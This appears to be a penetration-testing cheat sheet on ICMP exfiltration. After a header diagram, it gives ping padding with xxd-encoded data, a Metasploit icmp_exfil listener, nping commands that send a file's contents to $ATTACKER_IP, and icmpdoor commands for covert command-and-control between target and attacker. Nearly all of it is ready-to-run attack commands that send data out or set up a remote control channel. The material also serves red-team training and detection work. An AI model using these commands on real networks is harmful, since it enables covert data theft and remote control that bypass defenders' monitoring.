65 lines
2.0 KiB
Markdown
65 lines
2.0 KiB
Markdown
# ICMP Exfiltration
|
|
|
|
* [ICMP Types](https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtm)
|
|
|
|
* Type 0, which is Echo Reply contains an optional data field inside the header
|
|
```
|
|
0 1 2 3
|
|
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
|
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
|
| Type | Code | Checksum |
|
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
|
| Identifier | Sequence Number |
|
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
|
| |
|
|
+ Data +
|
|
| |
|
|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
|
```
|
|
|
|
## Usage
|
|
|
|
* The `Pattern` parameter can be used to pad the bytes. From the manual
|
|
```
|
|
-p pattern
|
|
You may specify up to 16 “pad” bytes to fill out the packet you send. This is useful for diagnosing
|
|
data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones.
|
|
```
|
|
|
|
* Pad hex values
|
|
```sh
|
|
ping $TARGET_IP -c 1 -p $(echo "data payload" | xxd -p )
|
|
```
|
|
|
|
### Metasploit ICMP Exfiltration
|
|
|
|
* Awaiting ICMP data on Attacker
|
|
```sh
|
|
use auxiliary/server/icmp_exfil
|
|
set BPF_FILTER icmp and not src $ATTACKER_IP
|
|
set interface <interface>
|
|
run
|
|
```
|
|
|
|
* Exfiltrating from target via `ping` shown above or use `nping`
|
|
* Starting the transmission via `nping` and BOF
|
|
```sh
|
|
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "BOFpayload.txt"
|
|
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "actual payload"
|
|
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "EOF"
|
|
```
|
|
|
|
### C2 over ICMP
|
|
|
|
* Use [krabelize's ICMPdoor](https://github.com/krabelize/icmpdoor)
|
|
|
|
* On target
|
|
```sh
|
|
sudo icmpdoor -i <interface> -d $ATTACKER_IP
|
|
```
|
|
|
|
* On attacker
|
|
```sh
|
|
sudo icmp-cnc -i <interface> -d $TARGET_IP
|
|
```
|